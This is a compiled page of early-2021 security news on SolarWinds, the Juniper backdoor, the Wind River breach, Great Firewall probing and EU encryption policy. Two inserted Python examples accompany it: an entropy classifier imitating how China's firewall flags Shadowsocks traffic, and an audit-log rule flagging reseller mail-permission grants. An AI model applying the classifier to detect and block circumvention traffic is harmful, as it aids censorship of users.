Calls for encryption backdoors date back to the 1990s and the so-called Crypto Wars. That’s when President Bill Clinton’s administration insisted that U.S. government have a way to break the encryption that was exported outside of the United States.
Juniper Lessons Not Learned, Repeated with SolarWinds Hack?
In the Jan. 28 letter to NSA chief Gen. Paul Nakasone, the group of Democratic lawmakers want the agency to provide a previously undisclosed report about “lessons learned” from the Juniper hack and detail what actions NSA took afterwards. The lawmakers gave NSA until Feb. 26 to respond.
In June, Wyden also co-signed a letter to Juniper CEO Rami Rahim seeking answers about the hack. Experts have long expressed concern that the weaknesses in the NSA algorithm could have been exploited by any number of hackers. The SolarWinds and Juniper hacks are similar in that both involved federally managed computer systems and compromised software supply chains.
Wind River Security Incident Affects SSNs, Passport Numbers
2.2.2021 BigBrothers Threatpost
Wind River Systems is warning of a ‘security incident’ after one or more files was downloaded from its network.
Wind River Systems, which develops embedded system software, on Friday warned of a “security incident” that had exposed personnel records.
One or more files were downloaded from the company’s network on or around September 29, it said. Affected data included information maintained within the company’s personnel records – including critical data like Social Security numbers, driver’s license numbers and passport numbers.
“We have been working with law enforcement and outside experts to investigate a security incident that occurred toward the end of September,” according to the security-incident notice, filed with California’s Attorney General as part of the state’s data-breach notification requirements. “We have no indication that any information in these files has been misused.”
Alameda, Calif.-based Wind River develops software for embedded systems, such as Wind River Linux, its embedded Linux development platform. Embedded systems are microprocessor units on a chip that serve a dedicated function within a larger system.
The company is also known for industry-specific software offerings for the aerospace and defense, industrial and automotive fields, for instance.
Wind River said that the full scope of information affected includes dates of birth, SSNs, social insurance, driver’s license or national identification numbers, passport or visa numbers, health information or financial account information. It’s not stated which specific health information is affected. If accessed, this type of data can provide cybercriminals the tools that they need for identity-theft attacks, phishing scams and more.
It’s unclear how many are affected, and if those affected include any clients. As of 2018, the company had 1,200 employees. What’s also not stated is the context around how the files were downloaded from Wind River’s network.
Threatpost has reached out to Wind River for further details.
The company said in its notification that it is not aware of any “actual or attempted misuse” of personal information as a result of the event. “Recent searches by our experts did not uncover any of these files online,” according to Wind River.
The company said that it has installed additional security monitoring tools and implemented new processes as a result of the incident. In the meantime, it is telling those affected to remain vigilant by monitoring their credit reports.
Wind River said it “will continue to focus on improving the cyber-resiliency and security posture of our company.”
Wind River has previously dealt with various security incidents. In 2019, researchers said that Wind River VxWorks versions that include the IPnet stack are affected by a group of bugs collectively called “URGENT/11.” In 2015, a TCP prediction vulnerability was found in Wind River’s widely deployed VxWorks embedded software that could enable an attacker to disrupt or spoof the TCP connections to and from target devices.
CISA: Many victims of SolarWinds hackers had no direct connection to SolarWinds
2.2.2021 BigBrothers Securityaffairs
The U.S. CISA reveals that many of the victims of the SolarWinds hackers had no direct connection to SolarWinds.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that many of the organizations targeted by the SolarWinds hackers had no direct link to the supply chain attack.
“While the supply chain compromise of SolarWinds first highlighted the significance of this cyber incident, our response has identified the use of multiple additional initial infection vectors. We have found that significant numbers of both the private-sector and government victims linked to this campaign had no direct connection to SolarWinds,” a CISA spokesperson told SecurityWeek.
“This is an ongoing response, and we are still working with our government and private sector partners to fully understand this campaign, and to develop and share timely information to mitigate the threat posed by this adversary,” the agency said.
CISA’s acting director, Brandon Wales, told The Wall Street Journal that about a third of the victims were not using the Orion software.
According to Wales, some victims were compromised before the threat group started the supply chain attack.
“The attackers ‘gained access to their targets in a variety of ways. This adversary has been creative,’ said Mr. Wales, whose agency, part of the U.S. Department of Homeland Security, is coordinating the government response. ‘It is absolutely correct that this campaign should not be thought of as the SolarWinds campaign,’” the WSJ reported.
Researchers from cybersecurity firm Volexity reported that SolarWinds hackers compromised a U.S. think tank several times, but they exploited the compromised SolarWinds supply chain in just one case.
In Mid-January, security firm Malwarebytes revealed that SolarWinds hackers also breached its systems and gained access to its email.
The intrusion took place last year; the company pointed out that the hackers used a different attack vector and did not exploit the SolarWinds Orion software.
The intruders compromised some internal systems by exploiting a weakness in Azure Active Directory and abused malicious Office 365 applications.
“We continue to maintain that this is an espionage campaign designed for long-term intelligence collection,” Mr. Wales concluded. “That said, when you compromise an agency’s authentication infrastructure, there is a lot of damage you could do.”
Lawmakers Ask NSA About Its Role in Juniper Backdoor Discovered in 2015
2.2.2021 BigBrothers Securityweek
Several U.S. lawmakers sent a letter to the National Security Agency last week in an effort to find out more about its role in the backdoor discovered in Juniper Networks products back in 2015, as well as the steps taken by the agency following the Juniper incident, and why those steps failed to prevent the recent SolarWinds hack.
In late 2015, Juniper Networks informed customers that it had discovered unauthorized code in some versions of its ScreenOS operating system, which powered the company’s firewalls. The code introduced a vulnerability that could be exploited to gain remote access to a device, and a vulnerability that could have been leveraged to decrypt VPN traffic.
The VPN issue was related to the use of Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG), a NIST-approved cryptographic algorithm that had been known to contain a backdoor introduced by the NSA. Juniper had made some changes to prevent abuse, but the malicious code enabled the backdoor. Some speculated that the intelligence agency was responsible for the unauthorized code, but Juniper believed it was likely targeted by a foreign government.
Similar to the recent SolarWinds hack, in which attackers, believed to be backed by Russia, delivered malicious updates to many of the company’s customers, the Juniper backdoor was also delivered to many government and private organizations in the United States, either via security updates or new products.
A few months ago, a group of three senators and 13 members of the U.S. House of Representatives sent a letter to Juniper, asking the company about the results of its investigation into that incident. Juniper said it added support for Dual EC DRBG at the request of a customer, but did not say who that customer was or whether the customer was a U.S. government agency. The company said none of the people involved in the decision to use the problematic cryptographic algorithm still works there.
Senators and House members have now sent a letter to the NSA in an effort to learn more about the agency’s role in the Juniper incident.
In their letter, the lawmakers noted that the Juniper backdoor may have allowed a foreign government or a different adversary to hack into the communications of many businesses and government agencies. They have asked the NSA to describe the steps it took following the disclosure of the Juniper incident to protect government agencies, and why those measures haven’t prevented the recent SolarWinds supply chain attack.
The NSA has also been instructed to share more information regarding its development and use of the algorithm, and say whether it was the customer that asked Juniper to add support for it in its products.
The lawmakers are also interested in finding out why the NSA thought it would be legal to introduce a backdoor into an algorithm approved by the U.S. government, and who it would need approval from if it wanted to introduce backdoors or other vulnerabilities into government standards.
The NSA has been given until February 26 to provide unclassified answers.
Russian Hack Brings Changes, Uncertainty to US Court System
2.2.2021 BigBrothers Securityweek
Trial lawyer Robert Fisher is handling one of America’s most prominent counterintelligence cases, defending an MIT scientist charged with secretly helping China. But how he’ll handle the logistics of the case could feel old school: Under new court rules, he’ll have to print out any highly sensitive documents and hand-deliver them to the courthouse.
Until recently, even the most secretive material, about wiretaps, witnesses and national security concerns, could be filed electronically. But that changed after the massive Russian hacking campaign that breached the U.S. court system’s electronic case files and those of scores of other federal agencies and private companies.
The new rules for filing sensitive documents are one of the clearest ways the hack has affected the court system. But the full impact remains unknown. Hackers probably gained access to the vast trove of confidential information hidden in sealed documents, including trade secrets, espionage targets, whistleblower reports and arrest warrants. It could take years to learn what information was obtained and what hackers are doing with it.
It’s also not clear that the intrusion has been stopped, prompting the rules on paper filings. Those documents are now uploaded to a stand-alone computer at the courthouse — one not connected to the network or Internet. That means lawyers cannot access the documents from outside the courthouse.
Fisher is defending Gang Chen, a nanotechnology researcher fighting charges that he defrauded the U.S.
“It would be cumbersome if we do have to start filing pleadings during the litigation on paper. That’s going to be more difficult,” Fisher said. “Particularly during COVID. Most of us are working from home.”
The Russian intrusion through the SolarWinds software has President Joe Biden in an early tussle with his Russian counterpart, President Vladimir Putin, and U.S. senators are worried about the “grave risk” to U.S. intelligence.
The Administrative Office of U.S. Courts confirmed the court system breach on Jan. 6, joining a victims’ list that includes the State Department, the National Institutes of Health, tech companies and an unknown number of Fortune 500 companies. U.S. officials have linked the effort, which went on for much of 2020, to elite Russian hackers.
“I don’t think we know what motivated the Russians in this case to target the court system — whether it was a target of opportunity enabled by this SolarWinds breach, or whether it was a ... priority,” said Ben Buchanan, who teaches cyberespionage at Georgetown University’s School of Foreign Service.
Though the entry point in the SolarWinds network software has been plugged, “it is really hard to kick the Russians out once they’re in,” he said.
Federal court operations are largely decentralized. Each of the 13 circuits adopts its own rules and security measures. Some courts encrypt documents filed under seal, but others do not, according to court employees who spoke with The Associated Press on condition of anonymity because they were not authorized to publicly discuss the security breach.
Either way, anyone sophisticated enough to launch the SolarWinds attack can probably decrypt data, perhaps by stealing an authorized user’s credentials, experts said. Targets could include not just court staff, but also “soft targets” such as law firms that upload files to the case management system, known as CM/ECF.
Criminal, civil and bankruptcy filings are believed to have been compromised, but not the Foreign Intelligence Surveillance Court system, which handles national security surveillance warrants, according to the court employees.
Senators are pressing court officials and the Justice Department for a clear assessment of the damage to the legal system.
“I fear that we do not know how Russia could take advantage of the access and information it may have obtained, and we likely won’t know until it’s far too late,” Sen. Richard Blumenthal, D-Conn., told The Associated Press in a statement. “The cleanup of this breach will be extraordinarily difficult ..., but we cannot cut corners and just hope that the Russians left.”
Some worry that the new rules will reduce public access to court proceedings, but they could also make judges rethink whether a seal or paper filing is really necessary. Court transparency advocates feel that judges have been on a sealing binge in recent years, keeping the public in the dark about important evidence in product liability, public corruption and other cases.
But others say the need for privacy is real, especially when it comes to corporate fights over patent secrets or other intellectual property, or whistleblower complaints, which remain secret while the government investigates. They fear that companies could be shaken down or see their stock price plummet if the information is exposed.
“There’s an underlying concern about what was breached. Our cases do ultimately come out from under seal, but the risk is a compromise in the interim, of a federal investigation or our clients,” said lawyer Erica Blachman Hitchings of the Whistleblower Law Collaborative in Boston.
Frank Montoya Jr., a retired FBI agent and counterterrorism expert, believes Russian officials will exploit whatever they can as they sift through the data, just as they did in 2016, when they leaked stolen Democratic National Committee emails during the U.S. presidential election. It could take years, or decades, to gauge their intent.
“We tend to still look at this stuff as spy versus spy. But the reality is, it’s not just about a specific targeted interest. It’s about exploiting everything to make money, to benefit the state, to undermine the U.S.,” he said.
But Georgetown’s Buchanan doesn’t see the Russian government selling trade secrets, even for something as valuable as the COVID-19 vaccine or a blockbuster drug. He believes it’s all about statecraft — and espionage.
Retired U.S. Circuit Judge Thomas Vanaskie, who led the U.S. Judicial Conference’s Information Technology Committee about 12 years ago, worries about the government’s duty to people who seek justice from the courts.
“We have assured counsel that you can file on our system, electronically, confidential material that will be sealed, and not subject to being hacked,” he said. “And here we are, hacked.”
CISA Says Many Victims of SolarWinds Hackers Had No Direct Link to SolarWinds
2.2.2021 BigBrothers Securityweek
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) says many of the victims of the threat group that targeted Texas-based IT management firm SolarWinds were not directly linked to SolarWinds.
“While the supply chain compromise of SolarWinds first highlighted the significance of this cyber incident, our response has identified the use of multiple additional initial infection vectors. We have found that significant numbers of both the private-sector and government victims linked to this campaign had no direct connection to SolarWinds,” a CISA spokesperson told SecurityWeek.
“This is an ongoing response, and we are still working with our government and private sector partners to fully understand this campaign, and to develop and share timely information to mitigate the threat posed by this adversary,” the agency said.
CISA’s acting director, Brandon Wales, told The Wall Street Journal last week that roughly 30% of the victims identified by the agency did not have a direct connection to SolarWinds. Wales also said some victims were compromised before SolarWinds started delivering malicious product updates to customers.
CISA warned shortly after the SolarWinds breach came to light that the supply chain compromise was not the only initial attack vector leveraged by the threat group, which the U.S. government and others have linked to Russia.
Threat intelligence and incident response firm Volexity reported that the same group, which it tracks as Dark Halo, hacked a U.S. think tank several times, but only one of their attack waves exploited the compromised SolarWinds supply chain.
The attackers have also been known to target organizations through Microsoft services, and the WSJ cited a person familiar with the SolarWinds investigation saying that SolarWinds has been trying to determine if its own network was initially breached through Microsoft services. Microsoft confirmed back in December that it had found some of the malicious SolarWinds files on its systems, but said it had found no evidence that its own systems were leveraged to target others.
Wales said Microsoft was the only cloud provider whose services were abused by the hackers and it did not appear that there was any other supply chain compromise aside from the one targeting SolarWinds.
Microsoft has been informing some companies that they have been targeted by the SolarWinds hackers through its cloud services. The list includes cybersecurity firms Malwarebytes, Mimecast and CrowdStrike.
Other cybersecurity firms targeted by the attackers or impacted to some extent include Palo Alto Networks, FireEye, Qualys and Fidelis Cybersecurity. Malwarebytes said it had not used any SolarWinds products, while Qualys and Fidelis said they received the malicious software updates pushed out by the attackers due to the fact that they had been analyzing the software.
CISA did not clarify whether victims with “no direct connection to SolarWinds” included organizations that had received the malicious updates but did not actually use the software.
SolarWinds said the malicious updates, which targeted its Orion monitoring product, were sent to roughly 18,000 customers, but investigations conducted to date revealed that only a few hundred government and private sector organizations were actually of interest to the attackers and received secondary payloads.
Experts explain how to bypass recent improvement of China’s Great Firewall
1.2.2021 BigBrothers Securityaffairs
Experts from Great Firewall Report analyzed recent upgrades to China’s Great Firewall and revealed that it can be circumvented.
Members of the Great Firewall Report group have analyzed the recent improvements made to China’s Great Firewall censorship system and revealed that it is possible to bypass it.
Last year, the group published a detailed analysis on how the Chinese government has improved its surveillance system to detect and block the popular circumvention tools Shadowsocks and its variants.
“Using measurement experiments, we find that the GFW uses the length and entropy of the first data packet in each connection to identify probable Shadowsocks traffic, then sends seven different types of active probes, in different stages, to the corresponding servers to test whether its guess is correct,” reads the paper published by the experts. “Based on our gained understanding, we present a temporary workaround that successfully mitigates the traffic analysis attack by the GFW.”
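The passive part of the detection the paper describes, classifying a connection by the length and entropy of its first packet, is easy to reproduce in a few lines. The following is an added Python example, not code from the Great Firewall Report or the GFW’s actual rules: the thresholds, the printable-text exemption and the TLS-header exemption are assumptions chosen for illustration, and the three “first packets” are constructed, not captured traffic.

```python
import math
import random
from collections import Counter

# Thresholds and exemptions below are assumptions for illustration; the GFW's real
# cut-offs and allow-list rules are not stated in the article.
MIN_FIRST_PACKET_LEN = 16
ENTROPY_THRESHOLD_BITS = 6.0      # bits per byte; uniformly random bytes approach 8.0
PRINTABLE_EXEMPT_RATIO = 0.5      # mostly-printable first packets look like plaintext protocols


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of the byte-value distribution, in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes in the printable ASCII range 0x20..0x7e."""
    if not data:
        return 0.0
    return sum(0x20 <= b <= 0x7E for b in data) / len(data)


def is_tls_record(data: bytes) -> bool:
    """Assumed allow-list rule: a TLS handshake record header (version 3.x) is not probed."""
    return len(data) >= 3 and data[0] == 0x16 and data[1] == 0x03 and data[2] <= 0x04


def looks_like_shadowsocks(first_packet: bytes) -> bool:
    """Length + entropy classification of a connection's first client-to-server packet.

    True when the packet is long enough, matches no exempted plaintext/TLS shape, and
    its byte entropy is high, i.e. it looks like headerless ciphertext or random data.
    """
    if len(first_packet) < MIN_FIRST_PACKET_LEN:
        return False
    if is_tls_record(first_packet):
        return False
    if printable_ratio(first_packet) > PRINTABLE_EXEMPT_RATIO:
        return False
    return shannon_entropy(first_packet) >= ENTROPY_THRESHOLD_BITS


# Constructed sample "first packets" (seeded RNG so the demo is reproducible).
_rng = random.Random(2021)
SAMPLE_FIRST_PACKETS = {
    "http_get": b"GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/7.68.0\r\n\r\n",
    # TLS 1.2 record header + handshake header, followed by random filler bytes.
    "tls_client_hello": b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"
                        + bytes(_rng.getrandbits(8) for _ in range(64)),
    # Fully encrypted payload with no header: the shape of a naive Shadowsocks first packet.
    "random_ciphertext": bytes(_rng.getrandbits(8) for _ in range(512)),
}


def classify_samples() -> dict:
    """Return {name: (length, entropy_bits, flagged)} for every sample packet."""
    return {
        name: (len(pkt), round(shannon_entropy(pkt), 2), looks_like_shadowsocks(pkt))
        for name, pkt in SAMPLE_FIRST_PACKETS.items()
    }


if __name__ == "__main__":
    for name, (length, ent, flagged) in classify_samples().items():
        print(f"{name:18s} len={length:4d} entropy={ent:4.2f} bits/byte flagged={flagged}")
```

Running the script shows the point of the paper: the HTTP request and the TLS record are exempted by their recognisable shape, while the headerless random payload is flagged on entropy alone. Any protocol whose first packet is pure ciphertext is exposed to the same heuristic, which is why the follow-up guidance concentrates on what that first packet looks like on the wire.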
Shadowsocks leverages SOCKS5 proxies outside China to avoid government censorship.
Shadowsocks is a free and open-source encryption protocol project, widely used in China to circumvent Internet censorship. It was created in 2012 by a Chinese programmer named “clowwindy”, and multiple implementations of the protocol have been made available since. The Shadowsocks software lets a client connect to a third-party SOCKS5 proxy that speaks the Shadowsocks protocol, and Internet traffic can then be directed through that proxy, similarly to a secure tunnel (SSH tunnel). Unlike an SSH tunnel,
In 2019, the Chinese authorities implemented the ability to detect Shadowsocks through traffic analysis and network probing, and block its connections.
Great Firewall Report experts revealed that recent versions of Shadowsocks (3.3.1 and earlier) could bypass the firewall.
“In this short post, we provide practical suggestions for non-technical users and circumvention tool developers to prevent their circumvention servers from being detected and blocked. We also introduce the mitigation to partitioning oracle attacks newly demonstrated by Len et al.,” reads the post published by Great Firewall Report.
The post is a practical guide to defending against the GFW’s latest active probing; it includes a list of precautions that need to be taken to avoid censorship, as well as detailed instructions for building a Shadowsocks-compatible proxy server.
Encrypted Services Providers Concerned About EU Proposal for Encryption Backdoors
30.1.2021 BigBrothers Crypto Securityweek
European encrypted services providers ProtonMail, Threema, Tresorit and Tutanota on Thursday urged European Union policy makers to rethink plans that would require the implementation of encryption backdoors.
The Council of the European Union in December adopted a resolution on “security through encryption and security despite encryption.” The council said it supports the development and use of strong encryption to protect citizens and organizations, but at the same time it believes law enforcement and judicial authorities need to be able to exercise their legal powers.
There has been a lot of discussion over the past years about finding a balance between providing strong encryption to users while also enabling law enforcement to access encrypted communications and data during their investigations. However, while policymakers around the world are convinced that such a balance can somehow be achieved, tech companies say it’s impossible, as it would require the implementation of encryption backdoors that could be leveraged not only by law enforcement, but also by bad actors.
ProtonMail, Threema, Tresorit and Tutanota say they are concerned about the Council of the EU’s resolution and they have each issued a statement warning that the rights of EU citizens are under threat from these anti-encryption proposals.
“Whilst it’s not explicitly stated in the resolution, it’s widely understood that the proposal seeks to allow law enforcement access to encrypted platforms via backdoors. However, the resolution makes a fundamental misunderstanding: encryption is an absolute, data is either encrypted or it isn’t, users have privacy or they don’t,” said Tresorit, which provides end-to-end encrypted cloud storage for businesses.
Andy Yen, the CEO of encrypted email service ProtonMail, commented, “Put simply, the resolution is no different from the previous proposals which generated a wide backlash from privacy conscious companies, civil society members, experts and MEPs. The difference this time is that the Council has taken a more subtle approach and explicitly avoided using words like ‘ban’ or ‘backdoor’. But make no mistake, this is the intention. It’s important that steps are taken now to prevent these proposals going too far and keep Europeans’ rights to privacy intact.”
Arne Möhle, CEO and founder of Tutanota, a free encrypted email service, warned about the implications for EU citizens.
“With the latest attempt to backdoor encryption, politicians want an easier way to prevent crimes such as terrorist attacks while disregarding an entire range of other crimes that encryption protects us from: End-to-end encryption protects our data and communication against eavesdroppers such as hackers, (foreign) governments, and terrorists. By demanding encryption backdoors, politicians are not asking us to choose between security and privacy. They are asking us to choose no security,” Möhle said.
And Martin Blatter, CEO and founder of secure messaging application Threema, warned about the implications for European businesses.
“Young European companies are now at the forefront of this revolution in technology and data protection. Experience shows that anything that weakens these achievements can and will be abused by third parties and criminals alike, thus endangering the security of all of us. With the abundance of uncontrollable open-source alternatives, users would simply move on to those applications if they knew a service was compromised,” said Blatter.
He added, “Forcing European vendors to bypass or deliberately weaken end-to-end encryption would destroy the European IT startup economy without providing even one bit of additional security. Europe would recklessly abandon its unique competitive advantage and become a privacy wasteland, joining the ranks of the most notorious surveillance states in the process.”
While law enforcement agencies have often complained about not being able to conduct their investigations due to strong encryption, there is some evidence suggesting that at least some agencies, such as the FBI, do have the resources needed to access data from encrypted devices.
Mimecast Confirms SolarWinds Hack as List of Security Vendor Victims Snowball
29.1.2021 BigBrothers Threatpost
A growing number of cybersecurity vendors like CrowdStrike, Fidelis, FireEye, Malwarebytes, Palo Alto Networks and Qualys are confirming being targeted in the espionage attack.
The Mimecast certificate compromise reported earlier in January is part of the sprawling SolarWinds supply-chain attack, the security firm has confirmed.
Mimecast joins other cybersecurity vendors like CrowdStrike, Fidelis, FireEye, Malwarebytes, Palo Alto Networks and Qualys in being targeted in the attack.
A Mimecast-issued certificate used to authenticate some of the company’s products to Microsoft 365 Exchange Web Services had been “compromised by a sophisticated threat actor,” the email-protection company announced in mid-January. That caused speculation that the breach was related to SolarWinds, which the firm confirmed in an update this week.
“Our investigation has now confirmed that this incident is related to the SolarWinds Orion software compromise and was perpetrated by the same sophisticated threat actor,” it announced. “It is clear that this incident is part of a highly sophisticated large-scale attack and is focused on specific types of information and organizations.”
The SolarWinds espionage attack, which has affected several U.S. government agencies and many others, began with a poisoned software update that delivered the Sunburst backdoor to around 18,000 organizations last spring. After that broad-brush attack, the threat actors (believed to have links to Russia) selected specific targets to further infiltrate, which they did over the course of several months. The compromises were first discovered in December.
Exfiltrated Mimecast Customer Information
Mimecast provides email-security services that customers can apply to their Microsoft 365 accounts by establishing a connection to Mimecast’s servers. The certificate in question was used to verify and authenticate those connections made to Mimecast’s Sync and Recover (backups for mailbox folder structure, calendar content and contacts from Exchange On-Premises or Microsoft 365 mailboxes), Continuity Monitor (looks for disruptions in email traffic) and Internal Email Protect (IEP) (inspects internally generated emails for malicious links, attachments or for sensitive content).
A compromise means that cyberattackers could take over the connection through which inbound and outbound mail flows, researchers said. It would be possible to intercept that traffic, or possibly to infiltrate customers’ Microsoft 365 Exchange Web Services and steal information. In this case, it appears that credentials were lifted.
“Our investigation also showed that the threat actor accessed, and potentially exfiltrated, certain encrypted service account credentials created by customers hosted in the United States and the United Kingdom,” the company said in its update. “These credentials establish connections from Mimecast tenants to on-premise and cloud services, which include LDAP, Azure Active Directory, Exchange Web Services, POP3 journaling, and SMTP-authenticated delivery routes.”
It added, “Although we are not aware that any of the encrypted credentials have been decrypted or misused, we are advising customers hosted in the United States and United Kingdom to take precautionary steps to reset their credentials.”
Threatpost reached out for further information, but did not immediately receive a response.
Mimecast Customer Mitigations
The hack was brought to Mimecast’s attention by Microsoft (itself a SolarWinds victim), which has disabled the certificate’s use for Microsoft 365.
Mimecast has also issued a new certificate and is urging users to re-establish their connections with the fresh authentication. It said in the update that “the vast majority of these customers have taken this action.”
Mimecast said that about 10 percent of its customers used the affected connections. It notes on its website that it has around 36,000 customers, so 3,600 could be potentially compromised. The company went on to say that out of those, “there are indications that a low single digit number of our customers’ Microsoft 365 tenants were targeted. We have already contacted these customers to remediate the issue.”
Malwarebytes, CrowdStrike Targeted via Email
Meanwhile, Malwarebytes last week confirmed that it too is a victim of the SolarWinds hackers – except that it wasn’t targeted through the SolarWinds platform.
“While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor,” it disclosed in a Tuesday web posting.
Instead of using the SolarWinds Orion network-management system, the advanced persistent threat (APT) abused “applications with privileged access to Microsoft Office 365 and Azure environments,” the security firm said — specifically, an email-protection application. No data exfiltration occurred, however.
When asked if the Mimecast email-protection application was the attack vector, the answer was no.
“Mimecast was not related to our incident,” a Malwarebytes spokesperson told Threatpost. “However, any third-party application can be abused if an attacker with sufficient administrative privilege gains access to a tenant. Because this threat actor goes to great lengths to be as stealthy as possible, it is critical to reduce the surface of attack by disabling unneeded on-premises and in the cloud applications while enabling granular logging for those that remain.”
Similarly, CrowdStrike caught a reseller’s Microsoft Azure account used for managing CrowdStrike’s Microsoft Office licenses making abnormal calls to Microsoft cloud APIs.
“There was an attempt to read email, which failed as confirmed by Microsoft,” the company said in a blog post back in December. “As part of our secure IT architecture, CrowdStrike does not use Office 365 email.”
“They got in through the reseller’s access and tried to enable mail ‘read’ privileges,” a source told Reuters. “If it had been using Office 365 for email, it would have been game over.”
CrowdStrike declined to comment further on its attack.
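The Malwarebytes and CrowdStrike cases above share one pattern: an account with delegated administrative access (a reseller, a licensing partner, a third-party application) is used to grant a mail-reading permission to an app, followed by an attempt to read mail. That sequence is detectable in tenant audit logs. The block below is an added Python example, not tooling from any of the vendors named in the article: the `AuditEvent` record shape and the sample timeline are constructed, the `actor_is_partner` flag is an assumption standing in for whatever marks a delegated-admin account in a real log, and the operation strings are only loosely modelled on Azure AD and Exchange audit activity names.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Sequence, Tuple


@dataclass(frozen=True)
class AuditEvent:
    """Constructed, simplified audit record; not Microsoft's real audit-log schema."""
    time: datetime
    actor: str                 # account or app that performed the action
    actor_is_partner: bool     # reseller / delegated-admin account (constructed flag)
    operation: str             # loosely modelled on Azure AD / Exchange audit activity names
    target: str                # application, service principal or mailbox acted on
    permissions: Tuple[str, ...] = ()
    succeeded: bool = True


# Microsoft Graph mail permissions plus the Exchange application-permission name.
# A grant of any of these by a partner-managed account is treated as high value.
MAIL_PERMISSIONS = {"Mail.Read", "Mail.ReadWrite", "Mail.ReadBasic.All", "full_access_as_app"}
GRANT_OPERATIONS = {
    "Consent to application",
    "Add app role assignment to service principal",
    "Add delegated permission grant",
}
MAILBOX_ACCESS_OPERATIONS = {"MailItemsAccessed"}


def partner_mail_grants(events: Sequence[AuditEvent]) -> List[AuditEvent]:
    """Rule 1: a partner/reseller account granted a mail-reading permission to an app."""
    return [
        e for e in events
        if e.operation in GRANT_OPERATIONS
        and e.actor_is_partner
        and set(e.permissions) & MAIL_PERMISSIONS
    ]


def correlate_mailbox_access(events: Sequence[AuditEvent], grants: Sequence[AuditEvent],
                             window: timedelta = timedelta(hours=24)) -> List[dict]:
    """Rule 2: for each flagged grant, collect mailbox-access attempts (successful or not)
    made by the newly privileged app within `window` after the grant."""
    findings = []
    for g in grants:
        attempts = [
            e for e in events
            if e.operation in MAILBOX_ACCESS_OPERATIONS
            and e.actor == g.target
            and g.time <= e.time <= g.time + window
        ]
        findings.append({"grant": g, "access_attempts": attempts})
    return findings


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample timeline; tenant, account and app names are placeholders.
SAMPLE_EVENTS = [
    AuditEvent(_t("2020-12-10T02:05:00"), "it-admin@victim.example", False,
               "Consent to application", "HR Portal", ("User.Read",)),
    AuditEvent(_t("2020-12-10T03:14:00"), "licensing@reseller.example", True,
               "Add app role assignment to service principal", "License Sync App", ("Mail.Read",)),
    AuditEvent(_t("2020-12-10T03:16:30"), "License Sync App", False,
               "MailItemsAccessed", "ceo@victim.example", (), succeeded=False),
    AuditEvent(_t("2020-12-11T09:00:00"), "licensing@reseller.example", True,
               "Add app role assignment to service principal", "License Sync App",
               ("Organization.Read.All",)),
]


def run_detection(events: Sequence[AuditEvent] = SAMPLE_EVENTS) -> List[dict]:
    """Apply both rules and return one finding per suspicious grant."""
    return correlate_mailbox_access(events, partner_mail_grants(events))


if __name__ == "__main__":
    for f in run_detection():
        g = f["grant"]
        print(f"[ALERT] {g.time} partner account {g.actor} granted {g.permissions} to {g.target}")
        for a in f["access_attempts"]:
            status = "succeeded" if a.succeeded else "FAILED"
            print(f"         {a.time} {a.actor} {a.operation} on {a.target}: {status}")
```

On the sample timeline only the reseller’s `Mail.Read` grant is alerted on, and the failed `MailItemsAccessed` attempt two minutes later is attached to it; the ordinary admin consent and the later non-mail grant are ignored. A failed read is still worth an alert: in the CrowdStrike case the attempt failed only because the company does not use Office 365 for email.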
Security Firms Battered in SolarWinds Gale
Mimecast joins FireEye in admitting actual damage from the attack. FireEye in December said that it had been hit in what CEO Kevin Mandia described as a highly targeted cyberattack. The attacker targeted and was able to access certain red-team assessment tools that the company uses to test its customers’ security.
The company soon confirmed that the attack was part of the SolarWinds supply-chain attack.
Other firms fall into the Malwarebytes camp – confirming having been targeted, but reporting that no damage was done.
“Qualys engineers downloaded the vulnerable/malicious SolarWinds Orion tool in our lab environment for testing, which is completely segregated from our production environment,” a spokesperson told Forbes this week. “Qualys’ in-depth investigations have concluded that there was no successful exfiltration of any data, even though the test system attempted to connect to the associated backdoor.”
Fidelis meanwhile announced in a blog post this week that it was also able to thwart bad consequences from the attack.
“Our current belief, subject to change given additional information, is that the test and evaluation machine where this software was installed was sufficiently isolated and powered up too infrequently for the attacker to take it to the next stage of the attack,” the firm wrote.
And Palo Alto Networks also said it was able to block the attack internally.
After the poisoned update, “our Security Operation Center then immediately isolated the server, initiated an investigation and verified our infrastructure was secure,” the company told Forbes. “Additionally, at this time, our SOC notified SolarWinds of the activity observed. The investigation by our SOC concluded that the attempted attack was unsuccessful and no data was compromised.”
It’s likely that other security firms will come to light as SolarWinds targets, according to Ami Luttwak, CTO and co-founder of Wiz.
“Why are the SolarWinds hackers going after security companies? When you piece together the puzzle it becomes scary,” Luttwak said via email. “They are trying to feed the beast, the more power they have, it gives them more tools and capabilities to attack more companies and get their capabilities as well. If we think about how this all started, they were after the FireEye tools… it’s like a game, they are attacking whoever has additional skills they can get.”
He added, “What does a company like Malwarebytes… have? Well… endless capabilities. Every sensitive computer out there runs a security agent, most of them even have a cloud portal that allows to run privileged commands on any computer directly.”
Many European CISOs Shift Focus to Mobile Security: Survey
29.1.2021 BigBrothers Securityweek
A majority of chief information security officers (CISOs) in Europe said their cybersecurity strategy now focuses on mobile devices as a result of employees increasingly working remotely due to the pandemic, IT management and cybersecurity solutions provider Ivanti said in a report published this week.
The information comes from a survey of 400 CISOs conducted in November and December 2020. The respondents worked for large enterprises in the UK, Germany, France, Spain, Italy and Benelux countries.
According to Ivanti’s report, which aims to promote the adoption of zero trust security strategies, 87% of CISOs said the focal point of their strategy is now mobile devices.
The biggest IT security challenges cited by respondents — during the pandemic — were the use of insecure Wi-Fi connections to access corporate assets (45%), employees using their own devices for work (40%), the use of unauthorized apps (33%), the use of public clouds to access business resources (33%), and mobile phishing attacks (32%).
